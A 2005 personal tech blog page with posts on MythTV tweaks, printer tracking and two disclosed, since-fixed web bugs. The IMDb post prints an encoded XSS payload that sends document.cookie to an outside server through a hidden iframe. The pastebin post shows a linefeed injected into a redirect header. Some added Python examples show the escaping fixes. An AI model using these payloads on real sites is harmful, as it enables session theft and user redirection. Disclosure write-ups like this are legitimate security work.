codeblog code is freedom — patching my itch

October 31, 2005

imdb xss

Filed under: Security,Vulnerabilities — kees @ 10:43 pm

Last week I discovered a cross-site scripting vulnerability in IMDb’s website. It was a strong enough vulnerability that I could actively steal login sessions with it. Part of their Search system would pass the “to-be-displayed” location on the URL, and didn’t quote HTML entities. I was able to steal my own cookies and log in with my IMDb account from another computer. Last Wed, I reported it:

26 Oct 2005 10:29:59 PM
Hello!

It seems your service is vulnerable to cross-site scripting (XSS). Since you
have login information stored as cookies, it’s possible for people to trick
others into exposing their logins. As an example, this displays your cookies to
you in your browser:

http://imdb.com/List?locations=a&&heading=18;%3Cscript%3Ealert(document.cookie)%3C/script%3E

Please let me know if you have any questions. I love using IMDb, and thought
you might want to make yourselves more secure.

Thanks!

At 9am today, they had fixed it:

31 Oct 2005 09:01:17 AM
Thank you for your feedback about the Internet Movie Database.

The IMDb is constantly being updated and improved, and we welcome all comments and suggestions aimed at improving its features, flexibility and ease of use.

We appreciate that you took the time to share your thoughts with us. It has now been fixed.

Thank you for your support!

--
Regards,
[name]
The IMDb Help Desk

Another success for vulnerability reporting!

As for a concrete example, the “heading” argument to their search tool was being displayed. The harmless example I used above just pops an alert dialog. To actually pass the cookies off-site where they can be collected, I used an invisible IFRAME, and pulled a content-less document from my server. To do this, I wanted the following to appear on the IMDb page:

<iframe src="http://outflux.net/null.html?cookie" width="0" height="0" frameborder="0"></iframe>

There are a number of ways to take the browser off-site. Another is the set of HTTP request methods used in a lot of AJAX applications. I haven’t dug into using those, even though they’re far more powerful: you don’t need to “hide” the results of an IFRAME, and if you don’t listen for the HTTP results they simply never get used; it’s only the “side-effect” of recording the cookie off-site that’s wanted. Since this XSS vulnerability lets me write JavaScript directly to the browser, I needed to inject the following:

document.write('<iframe src="http://outflux.net/null.html?'+document.cookie+'" width="0" height="0" frameborder="0"></iframe>')

And here it is, HTML-encoded, stuffed into the middle of the “heading” argument to the search function, disguised as a search for filming locations in Vancouver, BC:

http://imdb.com/List?endings=on&&locations=Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&&heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write('%3Ciframe%20src=%22http://outflux.net/null.html?'%2Bdocument.cookie%2B'%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C/iframe%3E')%3C/script%3E%20Canada

And if you click that, you can see their newly fixed entity-escaping. Again, kudos to IMDb! Additionally, it looks like they rearranged their search tool to not even use the “heading” argument anymore. Neato.
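As an added example (not IMDb’s code, and not from the original post), here is the before and after of this bug in Python: a page that reflects the “heading” parameter raw, beside one that escapes HTML entities the way IMDb’s fix does. The render functions and the constructed URL are assumptions standing in for the real search page.

```python
# Added example, not IMDb's code: reflect the "heading" query parameter raw
# (the bug above) versus with HTML entities escaped (the fix IMDb shipped).
# The render functions and the constructed URL are assumptions.
import html
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed URL carrying the same harmless alert payload quoted above.
CONSTRUCTED_URL = ("http://imdb.com/List?locations=a&&heading="
                   "18;%3Cscript%3Ealert(document.cookie)%3C/script%3E")


def heading_from_url(url: str) -> str:
    """Return the decoded 'heading' query value, or '' if it is absent.
    Split by hand so the doubled '&&' and the ';' in the value survive."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "heading":
            return unquote_plus(value)
    return ""


def render_vulnerable(heading: str) -> str:
    """Before: the to-be-displayed heading is pasted into the page as-is."""
    return f"<h1>{heading}</h1>"


def render_fixed(heading: str) -> str:
    """After: entity-escape the value, so < > & \" ' become inert text."""
    return f"<h1>{html.escape(heading, quote=True)}</h1>"


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(markup: str) -> bool:
    """Quick regression check: does a live <script> tag survive rendering?"""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    heading = heading_from_url(CONSTRUCTED_URL)
    print("vulnerable:", render_vulnerable(heading))
    print("fixed:     ", render_fixed(heading))
```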

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 28, 2005

gcc extensions

Filed under: General — kees @ 7:30 am

Robert Love wrote up a great summary of GCC extensions. Recommended reading! This is exactly the kind of summary I’ve been hoping to run into. Maybe I can go through Inkscape adding all sorts of fun tags to functions and variables now. :)


October 27, 2005

pastebin rulez

Filed under: Security,Vulnerabilities — kees @ 7:40 am

When discussing code on IRC, I’ve found http://pastebin.com/ to be a valuable resource for sharing code snippets. It has a really simple interface, and can give you a semi-private area just by specifying a subdomain (e.g. http://yayoutflux.pastebin.com/).

I had spent some time yesterday doing some other security audits, and figured I’d poke around at pastebin. Overall, the system was fine (only two inputs: text and name — both were strongly filtered). I did discover a redirect bug, though, which would let me use the site to redirect to somewhere else. While there isn’t anything to “steal” on pastebin, a bad guy could still trick their unsuspecting friends into visiting other (maybe more dangerous?) websites.

I reported the problem to pastebin’s author (Paul Dixon), and he had it fixed before I woke up. That’s how vulnerability reporting is supposed to work! Thanks Paul!

Here’s how it used to work. From the pastebin help, you can type in a subdomain to use for your pastebin. (Like “yayoutflux” above.) The form did some checking (no /’s allowed), but would accidentally let you send whitespace, including a linefeed.

Normally, a web redirect from that form would look something like this, where the user input (the subdomain name) lands in the Location header:

HTTP/1.1 302 Found
Location: http://yayoutflux.pastebin.com

However, if I add a linefeed (URL encoded as %0A: http://pastebin.com/pastebin.php?goprivate=cnn.com%0A), I could break the “Location” header and trick the browser into going somewhere else:

HTTP/1.1 302 Found
Location: http://cnn.com
.pastebin.com

Great illustration of redirection XSS.
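As an added example (not pastebin’s code, and not from the original post), here is the redirect in Python: the old behaviour that lets a linefeed in the “goprivate” value split the Location header, a hardened version that only accepts a plain DNS label, and a lenient header reader that shows where a browser would actually end up. Function names are assumptions; the response shape follows the post.

```python
# Added example, not pastebin's code: a linefeed in the "goprivate" subdomain
# splits the Location header (the bug above), and a validator that refuses it.
# Function names are assumptions; the response shape follows the post.
import re
from typing import Optional
from urllib.parse import unquote

# A single DNS label: letters, digits, inner hyphens; no dots, no whitespace.
SUBDOMAIN_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def build_redirect_unchecked(goprivate: str) -> str:
    """Old behaviour: the decoded form value goes straight into the header."""
    sub = unquote(goprivate)
    return f"HTTP/1.1 302 Found\r\nLocation: http://{sub}.pastebin.com\r\n\r\n"


def build_redirect_checked(goprivate: str) -> str:
    """Hardened: allow only a plain DNS label, otherwise answer 400."""
    sub = unquote(goprivate).lower()
    if not SUBDOMAIN_RE.fullmatch(sub):
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return f"HTTP/1.1 302 Found\r\nLocation: http://{sub}.pastebin.com\r\n\r\n"


def location_seen_by_client(raw: str) -> Optional[str]:
    """Read the first Location header the way a lenient client would, treating
    a bare LF as a line break. This is where the browser actually goes."""
    for line in re.split(r"\r?\n", raw):
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            return value.strip()
    return None


if __name__ == "__main__":
    for value in ("yayoutflux", "cnn.com%0A"):
        print(repr(value), "->",
              location_seen_by_client(build_redirect_unchecked(value)),
              "| checked:", build_redirect_checked(value).split("\r\n")[0])
```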


October 23, 2005

mythtv original air date visibility

Filed under: Multimedia — kees @ 3:12 pm

I have been really unhappy with MythTV’s visibility of program “Original Air Date” information, which as far as I could tell is only visible through the Program Finder. I wanted to be able to see original air date while I browsed my recordings. Digging through the MythTV code has proven very difficult. The documentation has been minimal, and I haven’t found any tutorials on theme creation, which seems to be where all the visible components of the mythfrontend get their details from.

While looking for the bleeding-edge code, I did find http://cvs.mythtv.org/ which is actually a Subversion repository, bug tracker, and wiki. There’s a nice start to the information there, including doxygen output. Also, the #mythtv-users channel on freenode has a nice MythTV FAQ.

The bulk of the display stuff I was looking for takes place in programs/mythfrontend/playbackbox.cpp (thanks, Bryce). The “cursorDown” function led me through to the “update*” functions, and eventually ToMap/SetText calls, which load program information into a hash, and then pass that hash to the theme engine.

libs/libmythtv/programinfo.cpp has ToMap defined, and all the various hash keys are visible, including the original air date variable I was looking for:

progMap["title"] = title;
progMap["subtitle"] = subtitle;
progMap["description"] = description;

progMap["originalairdate"] = originalAirDate.toString(dateFormat);

SetText is in libs/libmyth/uitypes.cpp. Hash items are uppercased to match %-enclosed words from the themes. The first “|” seen is to identify “what appears in front”, and the second is “what’s after”.

I modified the ui.xml from my theme (G.A.N.T. currently) from:

  <value>%SUBTITLE|"|"
%%STARS%%DESCRIPTION%</value>

to:

  <value>%SUBTITLE|"|" %%ORIGINALAIRDATE|(|)
%%STARS%%DESCRIPTION%</value>

So now, when I scroll down to Smallville, I see in the description box:

“Aqua” (2005-10-20)
During a beach party Lois hits her head when she jumps into the lake, and …

Ta-da! Original Air Date in parens. Now, being able to see the year is important, so I had to change my date format to one that included the year, but it’s ugly. To fix this, I need to actually change code. In “MythDateFormat” from programs/mythfrontend/globalsettings.cpp, I added:

gc->addSelection(sampdate.toString("ddd MMM d, yyyy"), "ddd MMM d, yyyy");

Now I just have to get it compiled. :)
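As an added example (not MythTV’s code, and not from the original post), here is a small Python expander for the %KEY|before|after% words in the theme’s ui.xml, driven by a progMap like the one ToMap builds; it reproduces the “Aqua” (2005-10-20) line above from the old and new theme values. That an empty field also drops its before/after text is an assumption; the rest follows the post.

```python
# Added example, not MythTV's code: a small expander for the %KEY|before|after%
# words used in the theme's ui.xml, driven by a progMap like the one ToMap
# builds. That an empty value also drops its before/after text is an
# assumption; the rest follows the post.
import re

# %KEY% or %KEY|before|after%; "after" may contain newlines, as in the theme.
TOKEN = re.compile(r"%([A-Z0-9_]+)(?:\|([^|%]*)\|([^%]*))?%")

# Constructed progMap with lowercase keys, as in programinfo.cpp's ToMap.
SMALLVILLE = {
    "title": "Smallville",
    "subtitle": "Aqua",
    "description": "During a beach party Lois hits her head.",
    "stars": "",
    "originalairdate": "2005-10-20",
}

OLD_VALUE = '%SUBTITLE|"|"\n%%STARS%%DESCRIPTION%'
NEW_VALUE = '%SUBTITLE|"|" %%ORIGINALAIRDATE|(|)\n%%STARS%%DESCRIPTION%'


def expand_theme_value(template: str, prog_map: dict) -> str:
    """Replace each %WORD...% with prog_map[word.lower()], wrapped in the
    before/after text when given. Unknown or empty keys expand to nothing."""
    def replace(match):
        key = match.group(1)
        before = match.group(2) or ""
        after = match.group(3) or ""
        value = prog_map.get(key.lower(), "")
        if value == "":
            return ""   # assumption: no wrapper text for an empty field
        return f"{before}{value}{after}"
    return TOKEN.sub(replace, template)


if __name__ == "__main__":
    print(expand_theme_value(OLD_VALUE, SMALLVILLE))
    print("---")
    print(expand_theme_value(NEW_VALUE, SMALLVILLE))
```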


October 19, 2005

color printer tracking

Filed under: Reverse Engineering,Security — kees @ 3:28 pm

I’m a little behind in my Slashdot reading, so apologies to those that saw this earlier.

The EFF cracked the nearly invisible finger-printing code produced by color printers. This system is used by most (if not all) major color printer manufacturers to report the serial number of the printer used and the date a page was printed. This system has been in place for at least 10 years. I’m horrified at this kind of privacy invasion. To quote the EFF:

“Underground democracy movements that produce political or religious pamphlets and flyers, like the Russian samizdat of the 1980s, will always need the anonymity of simple paper documents, but this technology makes it easier for governments to find dissenters,” said EFF Senior Staff Attorney Lee Tien. “Even worse, it shows how the government and private industry make backroom deals to weaken our privacy by compromising everyday equipment like printers. The logical next question is: what other deals have been or are being made to ensure that our technology rats on us?”

EFF press release: http://www.eff.org/news/archives/2005_10.php#004063
Washington Post coverage: http://www.washingtonpost.com/wp-dyn/content/article/2005/10/18/AR2005101801663.html
Slashdot: http://yro.slashdot.org/article.pl?sid=05/10/18/1210237&tid=158&tid=194


October 16, 2005

mythtv button sounds

Filed under: Multimedia — kees @ 11:51 am

Well, I’ve discovered that my “slow to respond” UI was entirely due to the lirc “repeat” settings. I’ve eliminated (“repeat=0”) the repeat settings for the Esc, Up, Down, Left, Right, Space, and Return buttons. I discovered this only after seeing that ircat was just as slow to respond. I’ve hacked together a “make noise” script (named “irnoise”) that runs along with mythfrontend:

#!/bin/bash
export SOUNDS=~mythtv/sounds

ircat mythtv | while read NAME; do
  case "$NAME" in
   Return|Space)
    SOUND=select.wav
    ;;
   *)
    SOUND=default.wav
    ;;
  esac
  #echo "$NAME: $SOUND"
  aplay -q "$SOUNDS"/"$SOUND"
done

This gives me my “boop” and “click” noises for all remote buttons. Yay! Since I couldn’t find the official TiVo noises, and I don’t feel like taking my TiVo apart right now, I just grabbed some noises I found online. From the “MiscWAVs.zip”, I used “THUD.WAV” and “BTN_DWN.WAV”:

sox src/THUD.WAV -t wav -c 1 -s -w -r 48000 default.wav resample
sox src/BTN_DWN.WAV -t wav -c 1 -s -w -r 48000 -v 2 select.wav resample
normalize-audio -m default.wav select.wav

Not a lot of complaints left with my MythTV installation. :)


mythtv dpi

Filed under: Multimedia — kees @ 9:43 am

I accidentally fixed my “fonts are too small” problem. While reading the MythTV development notes, there was mention of everything being designed for a 100dpi screen resolution. As it turns out, my Xorg config was defaulting to 75dpi, so I forced it with the DisplaySize option. Since my video card uses 640×480 for its NTSC output, I had to modify the recommended settings to use:

DisplaySize 162 121 # 100 DPI @ 640×480

I was surprised to discover that this solved my font size issues. I had so totally given up on the font size problem that I didn’t even list it as a problem in the prior MythTV blog entry. :) I was actually expecting fonts to get even smaller, but I guess this changes how font selection is done, and as a result, everything appears sane now. Neato!

Also yesterday, in the hopes of reducing the effects of the “crappy audio” problem, and allowing multiple programs to have the soundcard open, I figured out how to get ALSA working natively within MythTV. In the MythTV configurations, the sound device should be “ALSA:default” instead of “/dev/dsp”, and the mixer should be “default” instead of “/dev/mixer”. The start of this was gleaned from the link I mentioned earlier. Mixer settings were found through trial and error. Strangely, MythMusic had a separate playback configuration, so I had to change that to “ALSA:default” as well.

Now that ALSA is being used, the audio choppiness has not returned. I can still get desync’d A/V, but I think that’s entirely due to disk latency issues, or something like that. Usually when it happens, if I pause or restart playback, it goes away. Also, since multiple programs can open the ALSA device and play sounds at the same time (thank you ALSA dmix), I can start looking at how to add a tool to play “button press notification” sounds. I’ll initially probably use something like “ircat” piped to a reader just to get a proof-of-concept. Then I’ll find some hooks in mythfrontend to attach it to instead. Eventually, I want a themeable visual notification. I should probably join the dev list to make sure other folks aren’t already working on this.

I’ve also found mention of “show type priority bumping”, where “New Episode” can trigger a bump in the priority of a recording. This may be a good step towards recording new Stargates at high priority, but reruns at very low priority. In the priority adjusting tool, I can see the third row for this kind of priority bump, but I can’t find the UI elements to adjust it.


October 15, 2005

mythtv OMG

Filed under: Multimedia — kees @ 9:25 am

I was preparing myself to deal with the “pain” of moving to a multimedia system that didn’t have all the feature tweaks I need. MythTV has surprised me in that after only a week I’ve solved almost all my issues just by finding the right configuration options.

As of about Tuesday (2 days after the initial “commitment”), I was ready to call it “better than my existing system”. It had a few glitches that bugged me, but overall, it had many many more features than I was expecting. After watching Smallville Thursday night, I’m a total freak for MythTV. Smallville was basically the first “Production” show MythTV recorded for me. I had recorded “Medium” earlier in the week, and that served as a good way to feel out the interface. Smallville is the real test because it’s at position 1 in my TiVo (and MythTV) recording priorities. I had no irritations while watching it. Nicely done, MythTV.

Rewind to Saturday. Bryce and I spent about 12 hours straight digging through KnoppMyth both on his new system and my machine that I brought over to his place. By the end of it, I had entirely reinstalled my system with Debian Sid, and installed the most current ivtv drivers, with the apt-able myth binaries. We had figured out how to get KnoppMyth running with the newer tuner chip, but Bryce’s HD audio card wasn’t supported in that version of the kernel. Let me just say, everyone should just start with the latest ivtv driver. It detected everything correctly right off the bat. On Sunday, Bryce installed Gentoo, and got the latest ivtv, etc, everything was happy.

Early this week I toyed with the remote control settings, and discovered a whole mess of MPlayer commands I didn’t know about that let you control playback speed (including fast audio!), OSD text (so I can have a visible indication that I’m paused), etc. After restoring my other MPlayer defaults (16M cache, readable font, etc), MPlayer stuff was in great shape again, including DVD playback. I also programmed my spare TiVo remote to control my stereo power and volume. I’m down to 1 remote finally! (I was surprised that the TiVo remote programming codes aren’t online anywhere. The only guide seems to be in the TiVo itself.)

Yesterday I discovered MythWeb. I must have been blind to miss it before. That’ll teach me not to read the entire EFF MythTV guide first. Full scheduling, guide data, recorded show lists, and most importantly, the ability to adjust the keybindings for the various MythTV modules. In the MythMusic module, I was infuriated that “PgDn” would skip to the next song, instead of (wait for it) paging down in the list of songs. I just can’t understand why such a massively counter-intuitive setting is the default.

The commercial detection system is great so far. It’s already painful for me to go back to using my TiVo where I have to press the “skip 30 seconds” button ten times to get past all the commercials.

Current issues:

  • Interface is slow. Everything (especially the video browser) is slow to respond. I miss having an audible notification that a remote button was received, but there should at least be SOME kind of visible change when a button is pressed.
  • Intermittent crappy audio playback. Something goofy happens on playback sometimes where the audio is just totally trashed. I just have to quit the playback and try again. I wonder if switching everything to using ALSA would make things better.
  • No way to record the same show with two priorities. I want to have “New Episodes Only” for “Stargate: SG-1” at a high priority, but “Any time, any channel” for it at a very low priority. I haven’t figured out how to do this yet. I think I will have to write special recording rules for it in SQL somewhere secret.


October 6, 2005

freaky screen locking

Filed under: General — kees @ 8:54 pm

This afternoon, for no reason at all, I was annoyed that my music didn’t pause when I locked my screen. So I fixed that. Tonight, I checked my RSS feeds and discovered that Corey did exactly the same thing today.

I think that’s really freaky. Inter-city Open Source Mind-Meld. Only I did mine with xscreensaver and xmms:

#!/bin/bash
xmms --pause
xscreensaver-command lock

What I want now is a way to get xmms to unpause after I unlock my screen. :) I thought of a horrible hack for xscreensaver to do this, but I’m hoping there’s some other way.

